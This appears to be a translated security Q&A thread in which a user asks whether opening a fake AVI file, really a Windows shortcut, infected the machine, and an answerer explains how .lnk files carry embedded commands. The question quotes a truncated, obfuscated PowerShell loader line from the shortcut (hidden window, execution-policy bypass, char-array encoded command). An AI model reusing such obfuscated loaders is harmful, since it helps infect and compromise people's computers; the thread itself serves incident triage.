¿Acabo de infectar mi máquina?

Navega tus respuestas
2

Acabo de ejecutar un archivo AVI que me enviaron, pensando que los archivos AVI eran seguros. Resulta que era un acceso directo de Windows con esto en la ruta: 

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd
1 -eXEc ByP  . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',
[CHar[]](36 ,97,115, 112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,
79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116, 101

Espero que la falta de parenes de cierre signifique que esto fue inocuo. ¿Me he jodido?

    
pregunta Brad Irby 05.12.2018 - 21:32
fuente

1 respuesta

0

Los archivos de acceso directo (técnicamente los archivos .lnk) son en su mayoría de texto y se pueden leer con cualquier programa que intente abrir el archivo en lugar de invocar ShellExecute . El texto contendrá el comando incrustado. La falta de paréntesis de cierre, lo incompleto del cmdlet New-Object , etc. probablemente signifique que está bien siempre que el atajo esté truncado; si no lo está, probablemente deberías asumir que la máquina está comprometida.

Por curiosidad, ¿qué programa de mierda le transfirió un archivo .LNK mientras ocultaba la extensión? Casi todos los programas que ocultan .LNK son conscientes de que los accesos directos pueden ser maliciosos y le advierten, les cambia el nombre o los bloquean directamente. ¿De repente llegó el siglo XX aquí? De todos modos, definitivamente deberías informar eso como un error de seguridad en el programa (asumiendo que, por supuesto, ambos ocultaron el .LNK y no te avisaron).

    
respondido por el CBHacking 05.12.2018 - 22:14
fuente

Lea otras preguntas en las etiquetas

¿Podemos usar la búsqueda de imagen inversa para omitir los CAPTCHA de imagen? Almacenar claves PGP en HSM